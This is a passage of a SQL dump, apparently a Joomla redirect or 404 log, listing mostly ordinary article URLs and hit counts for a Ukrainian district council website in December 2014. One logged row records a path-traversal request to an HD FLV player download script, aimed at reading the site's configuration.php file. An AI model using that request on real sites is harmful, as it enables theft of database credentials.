00:00:00',301),(11635,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1103:2013-10-03-09-29-30&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2014-12-03 18:03:35','0000-00-00 00:00:00',301),(11636,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1107:c-&catid=11&lang=en&Itemid=0','','','',1,0,'2014-12-03 18:03:55','0000-00-00 00:00:00',301),(11637,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1109:2013-10-18-10-25-30&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-12-03 18:04:37','0000-00-00 00:00:00',301),(11638,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1110:-9-2013-&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-12-03 18:04:45','0000-00-00 00:00:00',301),(11639,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1111:2013-10-22-16-06-36&catid=11&lang=en&Itemid=0','','','',1,0,'2014-12-03 18:05:05','0000-00-00 00:00:00',301),(11640,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1111:2013-10-22-16-06-36&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-12-03 18:05:10','0000-00-00 00:00:00',301),(11641,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1122:-1-&catid=11&lang=en&Itemid=','','','',1,0,'2014-12-03 18:05:23','0000-00-00 00:00:00',301),(11642,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1122:-1-&catid=11&lang=ru&Itemid=','','','',1,0,'2014-12-03 18:05:37','0000-00-00 00:00:00',301),(11643,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1122:-1-&catid=11&lang=uk&Itemid=','','','',2,0,'2014-12-03 18:05:45','0000-00-00 00:00:00',301),(11644,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1125:2013-10-31-07-20-16&catid=11&lang=uk&Itemid=','','','',1,0,'2014-12-03 18:06:04','0000-00-00 00:00:00',301),(11645,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1125:2013-10-31-07-20-16&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-12-03 18:06:12','0000-00-00 00:00:00',301),(11646,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1127:2013-11-05-12-58-04&catid=11&lang=en&Itemid=0','','','',1,0,'2014-12-03 18:07:35','0000-00-00 00:00:00',301),(11647,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1127:2013-11-05-12-58-04&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2014-12-03 18:07:57','0000-00-00 00:00:00',301),(11648,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1128:2013-11-06-13-04-56&catid=11&lang=en&Itemid=0','','','',1,0,'2014-12-03 18:08:02','0000-00-00 00:00:00',301),(11649,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1140:80-1932-33-l-r&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-12-03 18:08:18','0000-00-00 00:00:00',301),(11650,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1140:80-1932-33-l-r&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2014-12-03 18:08:22','0000-00-00 00:00:00',301),(11651,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1105:2013-10-11-16-43-25&lang=ru&option=com_content&view=article','','','',2,0,'2014-12-03 19:35:51','0000-00-00 00:00:00',301),(11652,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1049:2013-07-15-05-50-46&lang=ru&option=com_content&view=article','','','',1,0,'2014-12-03 19:35:53','0000-00-00 00:00:00',301),(11653,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1000:1&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-12-03 19:36:02','0000-00-00 00:00:00',301),(11654,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1000:1&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-12-03 19:36:07','0000-00-00 00:00:00',301),(11655,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1003:1&catid=11&lang=en&Itemid=0','','','',1,0,'2014-12-03 19:36:31','0000-00-00 00:00:00',301),(11656,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1003:1&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-12-03 19:36:38','0000-00-00 00:00:00',301),(11657,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1056:-22-&catid=11&lang=en&Itemid=0','','','',1,0,'2014-12-03 19:36:54','0000-00-00 00:00:00',301),(11658,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1056:-22-&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-12-03 19:36:57','0000-00-00 00:00:00',301),(11659,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1056:-22-&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-12-03 19:37:00','0000-00-00 00:00:00',301),(11660,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1111:2013-10-22-16-06-36&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-12-03 19:37:05','0000-00-00 00:00:00',301),(11661,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1115:-24-&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-12-03 19:37:11','0000-00-00 00:00:00',301),(11662,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1121:-24-6-&catid=11&lang=en&Itemid=','','','',4,0,'2014-12-03 19:37:23','0000-00-00 00:00:00',301),(11663,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1124:2013-10-30-08-05-10&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-12-03 19:37:41','0000-00-00 00:00:00',301),(11664,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1125:2013-10-31-07-20-16&catid=11&lang=en&Itemid=','','','',1,0,'2014-12-03 19:37:44','0000-00-00 00:00:00',301),(11665,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1125:2013-10-31-07-20-16&catid=11&lang=ru&Itemid=','','','',1,0,'2014-12-03 19:37:47','0000-00-00 00:00:00',301),(11666,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1130:2013-11-07-14-04-12&catid=11&lang=en&Itemid=0','','','',1,0,'2014-12-03 19:38:01','0000-00-00 00:00:00',301),(11667,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1130:2013-11-07-14-04-12&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-12-03 19:38:06','0000-00-00 00:00:00',301),(11668,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1130:2013-11-07-14-04-12&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-12-03 19:38:10','0000-00-00 00:00:00',301),(11669,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1131:9-------&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-12-03 19:38:18','0000-00-00 00:00:00',301),(11670,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1132:2013-11-13-10-02-24&catid=11&lang=en&Itemid=0','','','',1,0,'2014-12-03 19:38:32','0000-00-00 00:00:00',301),(11671,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1132:2013-11-13-10-02-24&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-12-03 19:38:35','0000-00-00 00:00:00',301),(11672,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1133:2013-11-14-07-12-22&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-12-03 19:38:57','0000-00-00 00:00:00',301),(11673,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1133:2013-11-14-07-12-22&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-12-03 19:39:01','0000-00-00 00:00:00',301),(11674,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1134:-25-6-&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-12-03 19:39:08','0000-00-00 00:00:00',301),(11675,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1134:-25-6-&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-12-03 19:39:11','0000-00-00 00:00:00',301),(11676,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1138:-15112013&catid=15&lang=en&Itemid=0','','','',1,0,'2014-12-03 19:39:35','0000-00-00 00:00:00',301),(11677,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1138:-15112013&catid=15&lang=ru&Itemid=0','','','',1,0,'2014-12-03 19:39:40','0000-00-00 00:00:00',301),(11678,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1138:-15112013&catid=15&lang=uk&Itemid=0','','','',1,0,'2014-12-03 19:39:42','0000-00-00 00:00:00',301),(11679,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1140:80-1932-33-l-r&catid=11&lang=en&Itemid=0','','','',1,0,'2014-12-03 19:40:03','0000-00-00 00:00:00',301),(11680,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1140:80-1932-33-l-r&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-12-03 19:40:12','0000-00-00 00:00:00',301),(11681,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1192:-2014-2015-&catid=56:--03022014-&Itemid=97&lang=en','','','',1,0,'2014-12-03 19:40:21','0000-00-00 00:00:00',301),(11682,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47&id=926:2013-02-21-09-02-30&lang=en&option=com_content&view=article','','','',1,0,'2014-12-03 21:10:17','0000-00-00 00:00:00',301),(11683,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53:--25102013-&id=1099:-l-r&lang=uk&option=com_content&view=article','','','',3,0,'2014-12-03 22:44:31','0000-00-00 00:00:00',301),(11684,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51:--19072013-&id=1051:--------4------&lang=uk&option=com_content&view=article','','','',2,0,'2014-12-03 22:44:35','0000-00-00 00:00:00',301),(11685,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1227:2014-02-25-07-36-58&lang=ru&option=com_content&view=article','','','',2,0,'2014-12-03 22:46:26','0000-00-00 00:00:00',301),(11686,'http://www.malyn-rayrada.org.ua/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php','','','',9,0,'2014-12-03 23:02:57','0000-00-00 00:00:00',301),(11687,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1258:2014-03-31-06-18-35&lang=uk&option=com_content&view=article','','','',2,0,'2014-12-04 01:52:54','0000-00-00 00:00:00',301),(11688,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1246:-2013-&lang=uk&option=com_content&view=article','','','',2,0,'2014-12-04 01:52:58','0000-00-00 00:00:00',301),(11689,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49:--12042013-&id=983:2013-04-04-11-23-57&lang=uk&option=com_content&view=article','','','',4,0,'2014-12-04 03:27:26','0000-00-00 00:00:00',301),(11690,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=954:-19-6-&lang=uk&option=com_content&view=article','','','',2,0,'2014-12-04 03:27:40','0000-00-00 00:00:00',301),(11691,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1000:1&lang=uk&option=com_content&view=article','','','',5,0,'2014-12-04 03:28:33','0000-00-00 00:00:00',301),(11692,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1057:--22072013--2100-&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-12-04 04:55:54','0000-00-00 00:00:00',301),(11693,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1059:2013-07-24-05-42-15&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-12-04 04:56:06','0000-00-00 00:00:00',301),(11694,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1060:2013-07-27-10-13-15&catid=11&lang=en&Itemid=0','','','',1,0,'2014-12-04 04:56:12','0000-00-00 00:00:00',301),(11695,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1060:2013-07-27-10-13-15&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-12-04 04:56:25','0000-00-00 00:00:00',301),(11696,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1061:2013-07-29-08-58-16&catid=11&lang=en&Itemid=0','','','',1,0,'2014-12-04 04:57:33','0000-00-00 00:00:00',301),(11697,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1062:2013-07-29-13-33-29&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-12-04 04:58:46','0000-00-00 00:00:00',301),(11698,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1063:2013-08-02-17-32-04&catid=11&lang=en&Itemid=0','','','',1,0,'2014-12-04 04:58:56','0000-00-00 00:00:00',301),(11699,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1063:2013-08-02-17-32-04&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-12-04 04:59:04','0000-00-00 00:00:00',301),(11700,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1064:2013-08-09-07-52-21&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-12-04 04:59:15','0000-00-00 00:00:00',301),(11701,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1071:2013-08-27-14-06-18&catid=11&lang=en&Itemid=0','','','',1,0,'2014-12-04 05:00:16','0000-00-00 00:00:00',301),(11702,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1071:2013-08-27-14-06-18&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-12-04 05:00:21','0000-00-00 00:00:00',301),(11703,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1071:2013-08-27-14-06-18&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-12-04 05:00:32','0000-00-00 00:00:00',301),(11704,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1072:-24-6-&catid=11&lang=en&Itemid=0','','','',1,0,'2014-12-04 05:00:41','0000-00-00 00:00:00',301),(11705,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1075:2013-09-06-09-25-33&catid=11&lang=en&Itemid=0','','','',1,0,'2014-12-04 05:02:14','0000-00-00 00:00:00',301),(11706,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1075:2013-09-06-09-25-33&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-12-04 05:02:18','0000-00-00 00:00:00',301),(11707,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1172:2014-01-14-14-46-07&lang=uk&option=com_content&view=article','','','',2,0,'2014-12-04 05:02:29','0000-00-00 00:00:00',301),(11708,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1095:2013-09-24-13-25-55&catid=11&lang=en&Itemid=0','','','',1,0,'2014-12-04 05:04:59','0000-00-00 00:00:00',301),(11709,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1095:2013-09-24-13-25-55&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-12-04 05:05:02','0000-00-00 00:00:00',301),(11710,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1095:2013-09-24-13-25-55&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-12-04 05:05:12','0000-00-00 00:00:00',301),(11711,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1097:2013-09-25-08-35-50&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-12-04 05:06:20','0000-00-00 00:00:00',301),(11712,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1097:2013-09-25-08-35-50&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-12-04 05:06:33','0000-00-00 00:00:00',301),(11713,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1101:2013-10-03-07-11-01&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-12-04 05:07:36','0000-00-00 00:00:00',301),(11714,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1101:2013-10-03-07-11-01&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-12-04 05:08:03','0000-00-00 00:00:00',301),(11715,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1103:2013-10-03-09-29-30&catid=11&lang=en&Itemid=0','','','',1,0,'2014-12-04 05:08:28','0000-00-00 00:00:00',301),(11716,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1146:2013-11-27-10-09-00&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-12-04 05:08:34','0000-00-00 00:00:00',301),(11717,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1146:2013-11-27-10-09-00&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-12-04 05:08:49','0000-00-00 00:00:00',301),(11718,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1154:7-&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-12-04 05:09:47','0000-00-00 00:00:00',301),(11719,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1154:7-&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-12-04 05:09:53','0000-00-00 00:00:00',301),(11720,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1154:7-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2014-12-04 05:09:56','0000-00-00 00:00:00',301),(11721,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1154:7-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2014-12-04 05:10:06','0000-00-00 00:00:00',301),(11722,'http://www.malyn-rayrada.org.ua/index.php?Itemid=98&catid=57:--15042014-&id=1249:2014-03-24-06-41-46&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-04 06:36:25','0000-00-00 00:00:00',301),(11723,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1265:2014-04-01-11-43-46&lang=ru&option=com_content&view=article','','','',2,0,'2014-12-04 06:36:26','0000-00-00 00:00:00',301),(11724,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=998:1&lang=uk&option=com_content&view=article','','','',3,0,'2014-12-04 06:36:28','0000-00-00 00:00:00',301),(11725,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1009:2013-05-24-09-23-50&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-04 08:11:14','0000-00-00 00:00:00',301),(11726,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1311:-69-1941-1945-&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-04 09:47:08','0000-00-00 00:00:00',301),(11727,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1245:2014-03-17-17-23-36&lang=uk&option=com_content&view=article','','','',3,0,'2014-12-04 11:19:06','0000-00-00 00:00:00',301),(11728,'http://www.malyn-rayrada.org.ua/index.php?Itemid=107&catid=59:--20062014-&id=1322:-2012-2015-&lang=ru&option=com_content&view=article','','','',1,0,'2014-12-04 11:19:14','0000-00-00 00:00:00',301),(11729,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51&id=1026:2013-06-14-05-02-34&lang=ru&option=com_content&view=article','','','',1,0,'2014-12-04 12:54:07','0000-00-00 00:00:00',301),(11730,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1125:2013-10-31-07-20-16&lang=ru&option=com_content&view=article','','','',1,0,'2014-12-04 12:54:13','0000-00-00 00:00:00',301),(11731,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=501:2011-12-14-13-07-32&lang=uk&option=com_content&view=article','','','',3,0,'2014-12-04 12:56:22','0000-00-00 00:00:00',301),(11732,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1311:-69-1941-1945-&catid=11&lang=en&Itemid=0','','','',1,0,'2014-12-04 13:26:08','0000-00-00 00:00:00',301),(11733,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1311:-69-1941-1945-&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-12-04 13:26:11','0000-00-00 00:00:00',301),(11734,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1311:-69-1941-1945-&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-12-04 13:26:13','0000-00-00 00:00:00',301),(11735,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1352:2014-06-26-06-51-20&catid=11&Itemid=14&lang=en','','','',1,0,'2014-12-04 13:26:30','0000-00-00 00:00:00',301),(11736,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1352:2014-06-26-06-51-20&catid=11&Itemid=14&lang=ru','','','',1,0,'2014-12-04 13:26:32','0000-00-00 00:00:00',301),(11737,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1074:2013-09-02-05-02-30&lang=uk&option=com_content&view=article','','','',3,0,'2014-12-04 14:27:21','0000-00-00 00:00:00',301),(11738,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/468-pro-zatverdzhennja-rajonnoi-cilovoi-programi','',12,0,'2014-12-04 15:36:59','0000-00-00 00:00:00',301),(11739,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1084:-qq&lang=en&option=com_content&view=article','','','',3,0,'2014-12-04 16:01:20','0000-00-00 00:00:00',301),(11740,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1035:2013-06-25-09-55-31&lang=en&option=com_content&view=article','','','',3,0,'2014-12-04 16:02:40','0000-00-00 00:00:00',301),(11741,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1176:-27-&lang=uk&option=com_content&view=article','','','',2,0,'2014-12-04 16:02:52','0000-00-00 00:00:00',301),(11742,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1334:2014-06-06-05-54-20&lang=ru&option=com_content&view=article','','','',1,0,'2014-12-04 16:02:54','0000-00-00 00:00:00',301),(11743,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1217:2014-02-21-13-52-36&lang=uk&option=com_content&view=article','','','',2,0,'2014-12-04 17:36:40','0000-00-00 00:00:00',301),(11744,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56&id=1205:2014-01-31-07-53-03&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-04 17:36:44','0000-00-00 00:00:00',301),(11745,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1258:2014-03-31-06-18-35&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2014-12-04 18:28:26','0000-00-00 00:00:00',301),(11746,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1209:-----2014-&lang=uk&option=com_content&view=article','','','',2,0,'2014-12-04 19:11:05','0000-00-00 00:00:00',301),(11747,'http://www.malyn-rayrada.org.ua/index.php?Itemid=18&catid=15:2010-06-06-09-34-01&id=1163:2013-12-20-07-44-35&lang=ru&option=com_content&view=article','','','',2,0,'2014-12-04 19:11:17','0000-00-00 00:00:00',301),(11748,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49&id=987:2013-04-15-06-06-41&lang=uk&option=com_content&view=article','','','',2,0,'2014-12-04 20:45:11','0000-00-00 00:00:00',301),(11749,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1313:2014-05-14-10-00-55&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-04 20:45:44','0000-00-00 00:00:00',301),(11750,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1011:2013-05-29-09-51-28&catid=11&lang=en&Itemid=0','','','',2,0,'2014-12-04 21:35:11','0000-00-00 00:00:00',301),(11751,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1013:2013-06-01-03-58-38&catid=11&lang=en&Itemid=0','','','',2,0,'2014-12-04 21:35:36','0000-00-00 00:00:00',301),(11752,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1013:2013-06-01-03-58-38&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-12-04 21:35:42','0000-00-00 00:00:00',301),(11753,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1013:2013-06-01-03-58-38&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-12-04 21:35:53','0000-00-00 00:00:00',301),(11754,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1017:-2013-&catid=11&lang=en&Itemid=0','','','',2,0,'2014-12-04 21:36:18','0000-00-00 00:00:00',301),(11755,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1017:-2013-&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-12-04 21:36:21','0000-00-00 00:00:00',301),(11756,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1017:-2013-&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-12-04 21:36:53','0000-00-00 00:00:00',301),(11757,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1018:2013-06-06-11-22-34&catid=11&lang=en&Itemid=0','','','',2,0,'2014-12-04 21:37:27','0000-00-00 00:00:00',301),(11758,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1018:2013-06-06-11-22-34&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-12-04 21:37:37','0000-00-00 00:00:00',301),(11759,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1018:2013-06-06-11-22-34&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-12-04 21:37:40','0000-00-00 00:00:00',301),(11760,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1034:2013-06-23-15-11-25&catid=11&lang=en&Itemid=0','','','',2,0,'2014-12-04 21:37:47','0000-00-00 00:00:00',301),(11761,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1034:2013-06-23-15-11-25&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-12-04 21:37:51','0000-00-00 00:00:00',301),(11762,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1034:2013-06-23-15-11-25&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-12-04 21:37:55','0000-00-00 00:00:00',301),(11763,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1038:2013-06-28-10-19-47&catid=11&lang=en&Itemid=0','','','',2,0,'2014-12-04 21:38:28','0000-00-00 00:00:00',301),(11764,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1038:2013-06-28-10-19-47&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-12-04 21:38:31','0000-00-00 00:00:00',301),(11765,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1038:2013-06-28-10-19-47&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-12-04 21:38:34','0000-00-00 00:00:00',301),(11766,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1038:2013-06-28-10-19-47&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-12-04 21:38:37','0000-00-00 00:00:00',301),(11767,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1040:2013-07-01-14-27-50&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-12-04 21:38:44','0000-00-00 00:00:00',301),(11768,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1040:2013-07-01-14-27-50&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-12-04 21:38:48','0000-00-00 00:00:00',301),(11769,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1042:-qq-&catid=11&lang=en&Itemid=0','','','',2,0,'2014-12-04 21:38:53','0000-00-00 00:00:00',301),(11770,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1042:-qq-&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-12-04 21:38:56','0000-00-00 00:00:00',301),(11771,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1042:-qq-&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-12-04 21:38:59','0000-00-00 00:00:00',301),(11772,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1049:2013-07-15-05-50-46&catid=11&lang=en&Itemid=0','','','',2,0,'2014-12-04 21:39:19','0000-00-00 00:00:00',301),(11773,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1049:2013-07-15-05-50-46&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-12-04 21:39:21','0000-00-00 00:00:00',301),(11774,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1049:2013-07-15-05-50-46&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-12-04 21:39:24','0000-00-00 